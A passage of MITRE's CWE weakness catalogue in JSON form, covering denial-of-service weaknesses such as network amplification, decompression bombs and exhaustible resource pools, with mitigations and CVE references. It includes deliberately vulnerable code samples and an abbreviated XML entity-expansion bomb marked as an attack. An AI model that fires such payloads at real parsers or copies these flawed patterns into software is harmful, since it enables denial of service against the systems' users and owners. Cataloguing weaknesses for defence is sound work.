Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Functional_Areas"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"406":{"attr":{"@_ID":"406","@_Name":"Insufficient Control of Network Message Volume (Network Amplification)","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not sufficiently monitor or control transmitted network traffic volume, so that an actor can cause the software to transmit more traffic than should be allowed for that actor.","Extended_Description":"In the absence of a policy to restrict asymmetric resource consumption, the application or system cannot distinguish between legitimate transmissions and traffic intended to serve as an amplifying attack on target systems. Systems can often be configured to restrict the amount of traffic sent out on behalf of a client, based on the client\'s origin or access level. This is usually defined in a resource allocation policy. In the absence of a mechanism to keep track of transmissions, the system or application can be easily abused to transmit asymmetrically greater traffic than the request or client should be permitted to.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Operation"},{"Phase":"Architecture and Design","Note":"If the application uses UDP, then it could potentially be subject to spoofing attacks that use the inherent weaknesses of UDP to perform traffic amplification, although this problem can exist in other protocols or contexts."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Amplification","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Resource Consumption (Other)"],"Note":"System resources can be quickly consumed leading to poor application performance or system crash. This may affect network performance and could be used to attack other systems and applications relying on network performance."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"An application must make network resources available to a client commensurate with the client\'s access level."},{"Phase":"Policy","Description":"Define a clear policy for network resource allocation and consumption."},{"Phase":"Implementation","Description":"An application must, at all times, keep track of network resources and meter their usage appropriately."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-113"},"Intro_Text":"This code listens on a port for DNS requests and sends the result to the requesting address.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)sock.bind( (UDP_IP,UDP_PORT) )while true:","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"data = sock.recvfrom(1024)if not data:(requestIP, nameToResolve) = parseUDPpacket(data)record = resolveName(nameToResolve)sendResponse(requestIP,record)","xhtml:br":["","","",""],"xhtml:div":{"#text":"break","attr":{"@_style":"margin-left:10px;"}}}}}},"Body_Text":"This code sends a DNS record to a requesting IP address. UDP allows the source IP address to be easily changed (\'spoofed\'), thus allowing an attacker to redirect responses to a target, which may be then be overwhelmed by the network traffic."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-0513","Description":"Classic \\"Smurf\\" attack, using spoofed ICMP packets to broadcast addresses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0513"},{"Reference":"CVE-1999-1379","Description":"DNS query with spoofed source address causes more traffic to be returned to spoofed address than was sent by the attacker.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1379"},{"Reference":"CVE-2000-0041","Description":"Large datagrams are sent in response to malformed datagrams.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0041"},{"Reference":"CVE-1999-1066","Description":"Game server sends a large amount.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1066"},{"Reference":"CVE-2013-5211","Description":"composite: NTP feature generates large responses (high amplification factor) with spoofed UDP source addresses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5211"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Network Amplification"}},"Notes":{"Note":[{"#text":"This can be resultant from weaknesses that simplify spoofing attacks.","attr":{"@_Type":"Relationship"}},{"#text":"Network amplification, when performed with spoofing, is normally a multi-channel attack from attacker (acting as user) to amplifier, and amplifier to victim.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Enabling_Factors_for_Exploitation, Name, Other_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Enabling_Factors_for_Exploitation, Modes_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Network Amplification","attr":{"@_Date":"2008-10-14"}}}},"407":{"attr":{"@_ID":"407","@_Name":"Inefficient Algorithmic Complexity","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"An algorithm in a product has an inefficient worst-case computational complexity that may be detrimental to system performance and can be triggered by an attacker, typically using crafted manipulations that ensure that the worst case is being reached.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Resource Consumption (Other)"],"Note":"The typical consequence is CPU consumption, but memory consumption and consumption of other resources can also occur."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-0244","Description":"CPU consumption via inputs that cause many hash table collisions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0244"},{"Reference":"CVE-2003-0364","Description":"CPU consumption via inputs that cause many hash table collisions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0364"},{"Reference":"CVE-2002-1203","Description":"Product performs unnecessary processing before dropping an invalid packet.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1203"},{"Reference":"CVE-2001-1501","Description":"CPU and memory consumption using many wildcards.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1501"},{"Reference":"CVE-2004-2527","Description":"Product allows attackers to cause multiple copies of a program to be loaded more quickly than the program can detect that other copies are running, then exit. This type of error should probably have its own category, where teardown takes more time than initialization.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2527"},{"Reference":"CVE-2006-6931","Description":"Network monitoring system allows remote attackers to cause a denial of service (CPU consumption and detection outage) via crafted network traffic, aka a \\"backtracking attack.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6931"},{"Reference":"CVE-2006-3380","Description":"Wiki allows remote attackers to cause a denial of service (CPU consumption) by performing a diff between large, crafted pages that trigger the worst case algorithmic complexity.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3380"},{"Reference":"CVE-2006-3379","Description":"Wiki allows remote attackers to cause a denial of service (CPU consumption) by performing a diff between large, crafted pages that trigger the worst case algorithmic complexity.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3379"},{"Reference":"CVE-2005-2506","Description":"OS allows attackers to cause a denial of service (CPU consumption) via crafted Gregorian dates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2506"},{"Reference":"CVE-2005-1792","Description":"Memory leak by performing actions faster than the software can clear them.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1792"}]},"Functional_Areas":{"Functional_Area":"Cryptography"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Algorithmic Complexity"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-395"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Functional_Areas, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Name, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Algorithmic Complexity","attr":{"@_Date":"2019-06-20"}}}},"408":{"attr":{"@_ID":"408","@_Name":"Incorrect Behavior Order: Early Amplification","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software allows an entity to perform a legitimate but expensive operation before authentication or authorization has taken place.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"696","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Amplification","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"System resources, CPU and memory, can be quickly consumed. This can lead to poor system performance or system crash."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This data prints the contents of a specified file requested by a user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function printFile($username,$filename){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"$file = file_get_contents($filename);if ($file && isOwnerOf($username,$filename)){}else{}return false;","xhtml:br":["","","","",""],"xhtml:i":"//read file into string","xhtml:div":[{"#text":"echo $file;return true;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"echo \'You are not authorized to view this file\';","attr":{"@_style":"margin-left:10px;"}}]}}}},"Body_Text":"This code first reads a specified file into memory, then prints the file if the user is authorized to see its contents. The read of the file into memory may be resource intensive and is unnecessary if the user is not allowed to see the file anyway."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2004-2458","Description":"Tool creates directories before authenticating user.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2458"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Early Amplification"}},"Notes":{"Note":{"#text":"Overlaps authentication errors.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Early Amplification","attr":{"@_Date":"2008-04-11"}}}},"409":{"attr":{"@_ID":"409","@_Name":"Improper Handling of Highly Compressed Data (Data Amplification)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not handle or incorrectly handles a compressed input with a very high compression ratio that produces a large output.","Extended_Description":"An example of data amplification is a \\"decompression bomb,\\" a small ZIP file that can produce a large amount of data when it is decompressed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Amplification","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"System resources, CPU and memory, can be quickly consumed. This can lead to poor system performance or system crash."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-53"},"Intro_Text":"The DTD and the very brief XML below illustrate what is meant by an XML bomb. The ZERO entity contains one character, the letter A. The choice of entity name ZERO is being used to indicate length equivalent to that exponent on two, that is, the length of ZERO is 2^0. Similarly, ONE refers to ZERO twice, therefore the XML parser will expand ONE to a length of 2, or 2^1. Ultimately, we reach entity THIRTYTWO, which will expand to 2^32 characters in length, or 4 GB, probably consuming far more data than expected.","Example_Code":{"attr":{"@_Nature":"attack","@_Language":"XML"},"xhtml:div":{"#text":"<?xml version=\\"1.0\\"?><!DOCTYPE MaliciousDTD [<!ENTITY ZERO \\"A\\"><!ENTITY ONE \\"&ZERO;&ZERO;\\"><!ENTITY TWO \\"&ONE;&ONE;\\">...<!ENTITY THIRTYTWO \\"&THIRTYONE;&THIRTYONE;\\">]><data>&THIRTYTWO;</data>","xhtml:br":["","","","","","","",""]}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-1955","Description":"XML bomb in web server module","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1955"},{"Reference":"CVE-2003-1564","Description":"Parsing library allows XML bomb","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1564"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Data Amplification"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS04-J","Entry_Name":"Limit the size of files passed to ZipInputStream"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Data Amplification","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Highly Compressed Data (Data Amplification)","attr":{"@_Date":"2009-05-27"}}]}},"410":{"attr":{"@_ID":"410","@_Name":"Insufficient Resource Pool","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software\'s resource pool is not large enough to handle peak demand, which allows an attacker to prevent others from accessing the resource by using a (relatively) large number of requests for resources.","Extended_Description":"Frequently the consequence is a \\"flood\\" of connection or sessions.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"400","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity","Other"],"Impact":["DoS: Crash, Exit, or Restart","Other"],"Note":"Floods often cause a crash or other problem besides denial of the resource itself; these are likely examples of *other* vulnerabilities, not an insufficient resource pool."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Do not perform resource-intensive transactions for unauthenticated users and/or invalid requests."},{"Phase":"Architecture and Design","Description":"Consider implementing a velocity check mechanism which would detect abusive behavior."},{"Phase":"Operation","Description":"Consider load balancing as an option to handle heavy loads."},{"Phase":"Implementation","Description":"Make sure that resource handles are properly closed when no longer needed."},{"Phase":"Architecture and Design","Description":"Identify the system\'s resource intensive operations and consider protecting them from abuse (e.g. malicious automated script which runs the resources out)."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following snippet from a Tomcat configuration file, a JDBC connection pool is defined with a maximum of 5 simultaneous connections (with a 60 second timeout). In this case, it may be trivial for an attacker to instigate a denial of service (DoS) by using up all of the available connections in the pool.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"<Resource name=\\"jdbc/exampledb\\"auth=\\"Container\\"type=\\"javax.sql.DataSource\\"removeAbandoned=\\"true\\"removeAbandonedTimeout=\\"30\\"maxActive=\\"5\\"maxIdle=\\"5\\"maxWait=\\"60000\\"username=\\"testuser\\"password=\\"testpass\\"driverClassName=\\"com.mysql.jdbc.Driver\\"url=\\"jdbc:mysql://localhost/exampledb\\"/>","xhtml:br":["","","","","","","","","","",""]}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1363","Description":"Large number of locks on file exhausts the pool and causes crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1363"},{"Reference":"CVE-2001-1340","Description":"Product supports only one connection and does not disconnect a user who does not provide credentials.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1340"},{"Reference":"CVE-2002-0406","Description":"Large number of connections without providing credentials allows connection exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0406"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insufficient Resource Pool"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"TPS00-J","Entry_Name":"Use thread pools to enable graceful degradation of service during traffic bursts"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 17, "Protecting Against Denial of Service Attacks" Page 517"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Functional_Areas, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"412":{"attr":{"@_ID":"412","@_Name":"Unrestricted Externally Accessible Lock","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software properly checks for the existence of a lock, but the lock can be externally controlled or influenced by an actor that is outside of the intended sphere of control.","Extended_Description":"This prevents the software from acting on associated resources or performing other behaviors that are controlled by the presence of the lock. Relevant locks might include an exclusive lock or mutex, or modifying a shared resource that is treated as a lock. If the lock can be held for an indefinite period of time, then the denial of service could be permanent.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"410","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"When an attacker can control a lock, the program may wait indefinitely until the attacker releases the lock, causing a denial of service to other users of the program. This is especially problematic if there is a blocking operation on the lock."}},"Detection_Methods":{"Detection_Method":{"Method":"White Box","Description":"Automated code analysis techniques might not be able to reliably detect this weakness, since the application\'s behavior and general security model dictate which resource locks are critical. Interpretation of the weakness might require knowledge of the environment, e.g. if the existence of a file is used as a lock, but the file is created in a world-writable directory."}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Description":"Use any access control that is offered by the functionality that is offering the lock."},{"Phase":["Architecture and Design","Implementation"],"Description":"Use unpredictable names or identifiers for the locks. This might not always be possible or feasible."},{"Phase":"Architecture and Design","Description":"Consider modifying your code to use non-blocking synchronization methods."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-69"},"Intro_Text":"This code tries to obtain a lock for a file, then writes to it.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function writeToLog($message){}fclose($logFile);","xhtml:div":{"#text":"$logfile = fopen(\\"logFile.log\\", \\"a\\");if (flock($logfile, LOCK_EX)) {}else 